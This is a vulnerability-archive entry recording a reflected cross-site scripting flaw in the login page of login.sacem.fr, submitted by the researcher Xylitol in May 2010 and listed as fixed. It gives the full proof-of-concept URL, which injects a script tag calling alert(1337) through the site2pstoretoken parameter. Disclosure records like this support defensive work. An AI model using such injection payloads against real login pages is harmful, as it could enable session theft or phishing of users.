Advertisements:
Security researcher Xylitol, has submitted on 23/05/2010 a cross-site-scripting (XSS) vulnerability affecting login.sacem.fr, which at the time of submission ranked 246534 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 24/05/2010. It is currently fixed.
Date submitted: 23/05/2010 Date published: 24/05/2010 Date fixed: 28/05/2010Status:  FIXED
Author: Xylitol Domain: login.sacem.fr Category: XSS Pagerank: 246534
URL: https://login.sacem.fr/j2ee/sacem/loginPage.jsp?site2pstoretoken=v1.2~1327~B3297E966ED4332478433B4F1
9CDD77B1613D4BDC863F71A0A1930B315D4B1A1C380AFD9EACC97E2CF84390EFC343E1AA6820A9E25E46FD920DC10A8AA906
8A61CF91F7E7%27%22%3E%3C/title%3E%3Cscript%3Ealert(1337)%3C/script%3EE69ACF1B42008E13F80468E6433602F
9F26D5969B91B76F4887276AA3C0F968AE4740803D0639607A7DFBCCA551F8FCA060241A2B998C76CF25903A75225C0FEFE2
AEB666322FF340F22C62DE75A1470C405A1B&p_error_code=&subscribername=&ssousername=&p_cancel_url=http%3A
%2F%2Fwww.sacem.fr%2Fcms&p_submit_url=https%3A%2F%2Flogin.sacem.fr%2Fpls%2Forasso%2FORASSO.wwsso_app
_admin.ls_login
Click here to view the mirror
Buy XSS Attacks book from Amazon!
XSS Attacks
Cross Site Scripting Exploits and Defense
Buy Detecting Malice book from RSnake
Website Fraud Loss Prevention
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.